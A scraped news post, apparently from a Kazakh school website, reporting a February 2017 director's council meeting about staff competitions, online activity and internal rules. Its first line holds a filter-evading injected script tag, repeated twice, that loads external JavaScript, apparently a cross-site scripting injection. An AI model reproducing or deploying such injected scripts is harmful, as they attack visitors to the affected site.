<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.02.2017

Мектеп директоры жанындағы кеңес

2017 жылы ақпан айының бірі күні мектепте директор жанындағы кеңес өткізілді. Күн тәртібіндегі мәселелер:

Мектепішілік № 209 (10.01.2017ж.) бұйрықтың орындалуы, ұжымдық келісімшарт мазмұнымен таныстыру ,мұғалімдердің күнделік.кз, мектептік сайттарындағы белсенділіктері, факультативтік сабақтардың жүргізілу барысы және мектептің мерейтойына дайындық жұмыстары.

Мектеп директоры Мейрамова Гүлсім Жұмағалиқызының оқу, тәрбие процесі туралы кіріспе сөзінен кейін мектеп директорының тәрбие ісі жөніндегі орынбасары Омарова А.Б. балалардың аудандық би, тапқырлар мен көңілділер сайыстарына қатысқанын , оқушылардың дайындығының нәтижелі болғанын баяндады.

Мұғалімдер: Жұманова С.Е. «Үздік флипчарт-сабақ» жоспары сайысына, Усембаева М.А., Сулейменова Р.А., Шаймерденова Г.М. республикалық эссе «Мектепке дейінгі оқыту » сайысына, Жаксиликова Ж.М., Уалханов Н.Б., Сулеймэн Е., Ериков К.З., Есенгулова Т.С. «ЭКСПО-2017» Мәңгілік елдің құндылықтары атты республикалық байқауға, Саутбаева А.Б., Турлыбекова Т.К., Аширханова Б.Қ., Самурат Н., Есенгулова Т.С. педагогтардың «Өнегелі ұстаз» конкурсына материалдарын жібергендері туралы есеп берді.

Күнделік.кз, мектептік сайттардағы мұғалімдердің белсенділігін арттыру және ішкі тәртіп ережелерін орындау мақсатында бірқатар шешімдер қабылданды..

Просмотров: 806


Пікір қосу



Деректерді қолтаңбаға қосу